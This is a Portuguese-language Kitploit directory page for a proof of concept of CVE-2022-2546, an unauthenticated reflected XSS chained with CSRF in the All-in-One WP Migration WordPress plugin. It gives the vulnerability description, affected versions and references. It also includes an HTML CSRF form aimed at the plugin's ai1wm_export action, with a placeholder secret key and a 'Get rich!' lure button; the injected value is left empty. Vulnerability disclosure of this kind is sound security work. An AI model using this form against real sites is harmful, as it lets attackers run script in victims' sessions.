Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/openxp-research/cve-2022-2546
Ferramentas de PhishingAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubopenxp-research/cve-2022-2546

CVE-2022-2546

All-in-One WP Migration < 7.63 - XSS Refletido Não Autenticado + CSRF

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

All-in-One WP Migration < 7.63 - XSS Refletido Não Autenticado + CSRF

Descrição

O plugin usa o tipo de conteúdo errado para, e não escapa adequadamente a resposta da ação ai1wm_export, permitindo que um atacante crie uma requisição que, quando submetida por qualquer visitante, irá injetar html ou javascript arbitrário na resposta que será executada na sessão da vítima.

Prova de Conceito

Atacante

Para reproduzir a falha, podemos exportar todo o conteúdo do site pelo plugin e inserir um nome inválido no nome do arquivo de saída.

VÍDEO DO ATACANTE

Ao validar a vulnerabilidade, é possível combinar o ataque com um CSRF, que forçará o navegador da vítima a enviar uma requisição com o payload.

Vítima

VÍDEO DA VÍTIMA

Código

root@kitploit:~
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
  <!--
    Note: The secret key must be obtained through other means.
    It is stored in the site option `ai1wm_secret_key`, but is
    static for the lifetime of the site.
  -->
  <input type="hidden" name="secret_key" value="[secret_key]">
  <input type="hidden" name="ai1wm_manual_export" value="1">
  <input type="hidden" name="archive" value="">

  <input type="submit" value="Get rich!">
</form>

Versões afetadas

All-in-One WP Migration < 7.63

Referências

Sucuri

WPScan

Hacking Force

Cross-Site Scripting (XSS)

Classificação

Tipo: Cross-Site Scripting

OWASP TOP 10: A03:2021-Injection

CWE: CWE-79 Neutralização Incorreta da Entrada Durante a Geração de Páginas Web ('Cross-site Scripting')

Pesquisadores/Hackers

Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) e Guilherme Acerbi (Ghost).

Baixar ferramenta